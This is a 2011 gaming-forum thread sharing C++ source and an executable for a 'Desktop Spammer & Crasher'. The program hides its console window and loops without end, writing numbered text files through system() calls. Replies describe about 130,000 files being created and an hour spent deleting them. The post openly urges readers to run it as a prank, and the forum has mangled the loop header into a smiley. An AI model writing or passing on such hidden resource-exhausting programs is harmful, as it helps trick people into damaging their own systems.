Post: [C++ Source & EXE] Desktop Spammer & Crasher
05-26-2011, 10:06 PM #1
(adsbygoogle = window.adsbygoogle || []).push({}); I was bored so I made this, You will all be curious to run it. Just dont cry or complain after your desktop has had triplets.

You must login or register to view this content. - Someone can do a Virus scan for me.

    #define _WIN32_WINNT 0x0500  
#include<iostream>
#include<windows.h>
#include<string.h>
#include <sstream>

using namespace std;

string str_i(int input)
{
stringstream out;
out << input;
return out.str();
}

int main(int argc, char *argv[])
{
HWND hWnd = GetConsoleWindow();
ShowWindow(hWnd, SW_HIDE);

string add_line[3]={"echo Relevant x>Rel_","",".txt"};
string output_line="";

int file_count=0;
for(;Winky Winky
{
add_line[1]=str_i(file_count);

output_line=add_line[0];
output_line+=add_line[1];
output_line+=add_line[2];

system(output_line.c_str());
file_count++;
}
}

The following 2 users say thank you to Relevant for this useful post:

Curt, RastaMajik
05-26-2011, 10:15 PM #2
Curt
Former Staff
You should also add to the thread "I take no responsibility for you using this on yourself" before some kid does it on himself and starts raging when his desktop is ****ed :dumb: :lol:
05-28-2011, 04:43 PM #3
Sloth
Banned
I ran it nm happened
05-28-2011, 07:50 PM #4
Originally posted by Cookiemonstaz View Post
I ran it nm happened


Are you using windows?
05-28-2011, 10:36 PM #5
Merkii
Former Staff
wait what does it do :O
05-29-2011, 02:26 PM #6
Sloth
Banned
Originally posted by Relevant View Post
Are you using windows?


Originally posted by .xMerkii View Post
wait what does it do :O

It does work but you expect people to run it on the desktop not in downloads.

Basically it creates around 130,000 files with the name rel_(fileNumberHere)
05-29-2011, 02:28 PM #7
Merkii
Former Staff
Originally posted by Cookiemonstaz View Post
It does work but you expect people to run it on the desktop not in downloads.

Basically it creates around 130,000 files with the name rel_(fileNumberHere)


130000 Gasp WTF
05-29-2011, 02:29 PM #8
Sloth
Banned
Originally posted by .xMerkii View Post
130000 Gasp WTF

Yup deleting them right now taking 1 hour.
05-29-2011, 02:31 PM #9
Merkii
Former Staff
You ran it on yourself? :dumb:
05-29-2011, 02:45 PM #10
Originally posted by .xMerkii View Post
You ran it on yourself? :dumb:


:fyea: Maximum trolling =D

+9001 You must login or register to view this content.

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo